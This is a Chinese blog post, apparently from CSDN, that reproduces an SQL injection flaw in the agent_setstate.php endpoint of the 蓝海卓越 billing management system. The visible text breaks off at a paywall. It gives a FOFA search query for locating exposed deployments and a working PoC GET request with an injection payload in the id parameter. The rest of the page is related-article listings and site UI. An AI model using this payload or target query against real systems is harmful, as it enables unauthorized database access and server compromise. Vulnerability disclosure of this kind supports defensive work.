蓝海卓越计费管理系统 agent_setstate.php SQL注入漏洞复现

已于 2024-05-24 13:43:17 修改
阅读量571 收藏
点赞数 2
分类专栏: 漏洞复现 文章标签: php 安全 web安全
于 2024-05-24 13:43:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/139172595
版权

0x01 产品简介

蓝海卓越计费管理系统是一套以实现网络运营为基础,增强全局安全为中心,提高管理效率为目的的网络安全运营管理系统,提供“高安全、可运营、易管理”的运营管理体验,基于标准的RADIUS协议开发,它不仅支持PPPOE和WEB认证计费,还支持802.1X接入控制技术,与其他厂商支持相应标准的产品兼容,结合蓝海卓越的PPPOE服务器网关,可提供更加丰富的功能。,另外,友好的Web访问管理的方式,为用户提供更好用、易用的方式,更贴心的使用形式。

0x02 漏洞概述

蓝海卓越计费管理系统 agent_setstate.php 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。

0x03 复现环境

FOFA:title=="蓝海卓越计费管理系统"

0x04 漏洞复现

PoC

GET /agent_setstate.php?id=(SELECT%202*(IF((SELECT%20*%20FROM%20(SELECT%20CONCAT(0x717a767071,(SELECT%20(ELT(6154=6154,1))),0x7170716a71,0x78))s),%208446744073709551610,%208446744073709551610))) HTTP/1.1
Host: your
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
Python对象序列化与反序列化的魔法方法(__getstate__()和__setstate__())
herosunly的博客
04-06 7478
1. 前言 2. 对序列化进行修改 2.1 对其中已有属性进行修改 2.2 添加新的属性 3. 对反序列进行修改 3.1 在__setstate__()中对__dict__属性进行修改 3.2 在__setstate__()中没有语句对__dict__属性进行修改 4. 对序列化与反序列化都进行修改 4.1 正常修改 4.2 结果形成嵌套结构 4.3 添加新属性
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 730
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
漏洞复现蓝海卓越计费管理系统 agent_setstate.php SQL注入漏洞
siu~
05-24 267
蓝海卓越计费管理系统 agent_setstate.php 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
Python 使用 __getstate__ 和 __setstate__ 魔法方法
jianghuixin
11-13 1万+
2021-03-21 更新 __getstate__ 与 __setstate__ 两个魔法方法分别用于Python 对象的序列化与反序列化 在序列化时, _getstate__ 可以指定将那些信息记录下来, 而 __setstate__ 指明如何利用已记录的信息
python魔术方法之__setstate__和__getstate__
weixin_43580966的博客
03-25 2176
python语法之魔法方法
TypeError: react__WEBPACK_IMPORTED_MODULE_0___default.a.createClass is not a function
游海东的技术专栏
05-24 1万+
1、错误描述 2、错误原因 import React, {Component} from 'react'; import {render} from 'react-dom'; import Button from 'react-bootstrap/Button'; var TickTock = React.createClass({ mixins: [SetIntervalMi...
_this2.setState is not a function错误解决办法
qq_20369621的博客
05-28 8195
编写RN的小伙伴都知道setState是RN最常见的一个函数,但是这个最简单的函数却是经常报错,这一次我们就来解决_this2.setState is not a function这个错误。首先来看一下我的代码,这段代码就是发送一个请求,然后在相应回调函数的地方解析出数据修改state内部的值,达到渲染界面的效果:import React,{Component} from 'react'; imp...
Joomla 3.4.3版本 SQL注入漏洞分析
Fly_鹏程万里
03-31 3404
0x00 漏洞分析 漏洞触发的代码位于:/administrator/components/com_contenthistory/models/history.php,getListQuery()函数内: 通过SQL及报错信息,可以知道我们的注入payload被插入到了红色框部分内。跟进getState()函数,位于libraries/legacy/model/legacy.php文件内,...
__getstate__ 与 __setstate__的作用
热门推荐
shuimuniao的专栏
11-23 1万+
一些对象类型(譬如,文件对象)不能进行 pickle。处理这种不能 pickle 的对象的实例属性时可以使用特殊的方法( _getstate_() 和 _setstate_() )来修改类实例的状态。这里有一个 Foo 类的示例,我们已经对它进行了修改以处理文件对象属性: class Foo(object):     def __init__(self, value, filename):
06-react-setState.md
03-31
大厂前端面试题目|# 开始 遇到一个需求、问题或者一段代码,如何能高效的分析、解决它,这是前端程序员的必备技能。否则你将无法独立工作,这不是企业需要的人才。本章将通过多个面试题,教你如何分析问题、解决...
前端大厂最新面试题-setState.docx
06-06
前端大厂最新面试题-setState.docx
浅谈使用React.setState需要注意的三点
08-28
本篇文章主要介绍了浅谈使用React.setState需要注意的三点,提出了三点对 React 新手来说是很容易忽略的地方,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
java餐饮管理系统源码加数据库-excellent-articles:优秀文章集
06-05
java餐饮管理系统源码加数据库 优秀文章集 KOA2框架原理解析和实现 loading动画的性能优化-摒弃Canvas,拥抱CSS3-实现点击特效 一次内联元素错位引发对line-height的思考 你所不知道的 CSS 阴影技巧与细节 如何给...
深入研究React中setState
08-28
主要介绍了深入研究React中setState源码,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
1. NAS和SAN存储
最新发布
u010198709的博客
06-13 404
流程:存储端共享裸块设备,客户端连接存储映射出sdx的虚拟硬盘,客户端分区格式化挂载使用。IQN名称格式: iqn.yyyy-mm.反域名:自定义名称。用户名:openfiler, 密码:password。磁盘接口:SATA,SAS、NVME。支持nfs、cifs协议共享存储空间。nfs:适用于Linux、Unix。类型:IP SAN、FC SAN。cifs:适用于Windows。磁盘类型:机械硬盘、SSD。基于文件系统级别的共享。DAS 直接附加存储。NAS 网络附加存储。SAN 存储区域网络。
PHP异常处理的最佳实践及常见问题解决
NatLindsay的博客
06-11 294
异常处理的基本原理是,当try块中的代码发生异常时,PHP会寻找匹配的catch块进行处理,如果没有找到对应的catch块,则异常会向上传递直至被处理为止。PHP异常处理是在开发过程中至关重要的一环,它能够帮助开发人员捕获和处理程序运行过程中的错误和异常情况,提高代码的稳定性和可靠性。在实际开发中,可能会遇到各种各样的异常处理问题,比如异常未被捕获、异常信息不清晰、异常处理性能问题等。合理地使用自定义异常类能够使异常处理更加灵活和规范化,有助于统一异常信息和错误码,提高代码的可维护性和可读性。
源码编译安装LAMP
潇的博客
06-12 866
LAMP 架构是目前成熟的企业网站应用模式之一,指的是协同工作的一整套系统和相关软件,能够提供动态Web站点服务及其应用开发环境。LAMP是一个缩写词,具体包括Linux操作系统、Apache网站服务器、MySQL数据库服务器、PHP(或Perl、Python)网页编程语言。本章将以源码编译的方式搭建LAMP环境,能够满足企业定制化的需求。在构建LAMP平台时,各组件的安装顺序依次为Linux、Apache、MySQL、PHP。其中Apache和MySQL的安装并没有严格的顺序;
初识形式化验证工具——CPN tools
qq_47966193的博客
06-13 946
CPN Tools工具学习
def __getstate__(self): # 在pickle之前拷贝类字典,然后删除pool值,最后返回 self_dict = self.__dict__.copy() del self_dict['pool'] return self_dict def __setstate__(self, state): # 在pickle之后将其更新 self.__dict__.update(state)
07-15
你的 `__getstate__()` 和 `__setstate__()` 方法看起来是正确的。在 `__getstate__()` 方法中,你创建了一个副本 `self_dict`,删除了 `self_dict` 中的 `'pool'` 键,并返回了剩余的字典。而在 `__setstate__()` 方法中,你使用传入的状态字典 `state` 来更新对象的字典。 这样的实现应该能够解决你遇到的 `PicklingError` 错误。通过删除 `'pool'` 键,你确保了 `AppBase.AliyunBase_android` 类的实例在被序列化时不会包含 `'pool'` 属性。 请确保在使用 `multiprocessing.Queue()` 传递类之前,已经正确地实现了 `__getstate__()` 和 `__setstate__()` 方法,并且类定义可被 pickle 库找到。如果问题仍然存在,请提供更多的代码和错误信息,以便我能够更好地帮助你解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值